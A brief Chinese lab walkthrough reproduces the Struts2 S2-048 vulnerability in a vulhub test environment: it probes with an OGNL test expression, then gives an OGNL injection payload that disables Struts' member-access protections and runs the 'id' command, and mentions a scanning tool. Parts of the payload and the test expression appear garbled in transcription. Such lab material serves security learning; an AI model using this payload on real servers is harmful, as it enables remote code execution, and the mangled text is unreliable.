实验环境:vulhub、strusts漏洞测试工具
开始:打开vulhub
进入struts2 -s2-048
查看开放端口
ifconfig找到ip
在浏览器上输入ip地址加上8080端口,如下图所示
在输入框输入${233233},提交
出现54289(233233)的答案,说明存在漏洞
使用代码(加粗为可修改) 可查看到相应的信息。
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)????(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@[email protected]().exec(‘id’).getInputStream())).(#q)}
也可使用测试工具
将网址复制上去,点击验证漏洞
出现048漏洞警告
完成!